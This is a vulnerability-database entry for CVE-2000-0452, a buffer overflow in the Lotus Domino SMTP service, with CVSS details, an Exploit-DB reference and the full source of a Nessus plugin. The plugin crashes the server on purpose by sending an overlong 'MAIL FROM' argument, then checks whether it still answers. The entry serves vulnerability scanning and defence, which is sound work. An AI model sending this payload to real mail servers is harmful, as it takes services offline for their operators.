Vulnerabilities > CVE-2000-0452 - Unspecified vulnerability in Lotus Domino Enterprise Server and Domino Mail Server

047910
CVSS 5.0 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
NONE
Integrity impact
NONE
Availability impact
PARTIAL
network
low complexity
lotus
nessus
exploit available
NVD
Published: 2000-05-18
Updated: 2008-09-10

Summary

Buffer overflow in the ESMTP service of Lotus Domino Server 5.0.1 allows remote attackers to cause a denial of service via a long MAIL FROM command.

Vulnerable Configurations

Part Description Count
Application
Lotus
6

Exploit-Db

descriptionLotus Domino Enterprise Server 5.0.1/5.0.2/5.0.3,Mail Server 5.0.1/5.0.2/5.0.3 Buffer Overflow. CVE-2000-0452,CVE-2000-1046. Remote exploits for multiple pla...
idEDB-ID:19944
last seen2016-02-02
modified2000-05-18
published2000-05-18
reportersmiler
sourcehttps://www.exploit-db.com/download/19944/
titleLotus Domino Enterprise Server 5.0.1/5.0.2/5.0.3,Mail Server 5.0.1/5.0.2/5.0.3 - Buffer Overflow

Nessus

NASL familySMTP problems
NASL idLOTUS_ESMTP_OVERFLOW.NASL
descriptionThe remote Lotus Domino SMTP server is affected by a buffer overflow vulnerability that can be triggered by an overly long argument to the
last seen2020-06-01
modified2020-06-02
plugin id10419
published2000-05-25
reporterThis script is Copyright (C) 2000-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/10419
titleLotus Domino SMTP MAIL FROM Command Remote Overflow
code
#
# (C) Tenable Network Security, Inc.
#

# Ref:
# From: "K. K. Mookhey" <[email protected]>
# To: [email protected], [email protected],
#  [email protected]
# Date: Mon, 11 Nov 2002 13:55:04 +0530
# Subject: Buffer Overflow in iSMTP Gateway
#

include("compat.inc");

if (description)
{
 script_id(10419);
 script_version("1.35");
 script_cvs_date("Date: 2018/11/15 20:50:24");

 script_cve_id("CVE-2000-0452");
 script_bugtraq_id(1229);

 script_name(english:"Lotus Domino SMTP MAIL FROM Command Remote Overflow");
 script_summary(english:"Overflows a buffer in the remote mail server");

 script_set_attribute(attribute:"synopsis", value:
"The remote SMTP server is affected by a remote buffer overflow
vulnerability.");
 script_set_attribute(attribute:"description", value:
"The remote Lotus Domino SMTP server is affected by a buffer overflow
vulnerability that can be triggered by an overly long argument to the
'MAIL FROM' command.

This problem may allow an attacker to crash the mail server or even
allow the execution of arbitrary code on this system.");
 script_set_attribute(attribute:"see_also", value:"https://downloads.securityfocus.com/vulnerabilities/exploits/smtpkill.pl");
 script_set_attribute(attribute:"solution", value:"Contact the vendor for a patch.");
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
 script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"true");

 script_set_attribute(attribute:"vuln_publication_date", value:"2000/05/18");
 script_set_attribute(attribute:"plugin_publication_date", value:"2000/05/25");

 script_set_attribute(attribute:"potential_vulnerability", value:"true");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_set_attribute(attribute:"cpe", value:"cpe:/a:lotus:domino_enterprise_server");
 script_end_attributes();

 script_category(ACT_DESTRUCTIVE_ATTACK);

 script_copyright(english:"This script is Copyright (C) 2000-2018 Tenable Network Security, Inc.");

 script_family(english:"SMTP problems");

 script_dependencie("smtpserver_detect.nasl", "sendmail_expn.nasl");
 script_require_keys("Settings/ParanoidReport");
 script_require_ports("Services/smtp", 25);

 exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("smtp_func.inc");

if (report_paranoia < 2) audit(AUDIT_PARANOID);


port = get_service(svc:"smtp", default: 25, exit_on_fail: 1);
if (get_kb_item('SMTP/'+port+'/broken')) exit(0);


soc = open_sock_tcp(port);
if (! soc) exit(1);

 data = smtp_recv_banner(socket:soc);
 if ( ! data || "Lotus Domino" >!< data ) exit(0);
crp = 'HELO example.com\r\n';
 send(socket:soc, data:crp);
 data = recv_line(socket:soc, length:1024);
if("250 " >< data)
{
 crp = 'MAIL FROM: nessus@' + crap(4096) + '\r\n';
 send(socket:soc, data:crp);
 buf = recv_line(socket:soc, length:1024);
}
 close(soc);

 soc = open_sock_tcp(port);
 if(soc)
 {
 r = smtp_recv_banner(socket:soc);
 }
  else r = 0;
 if(!r)security_hole(port);

References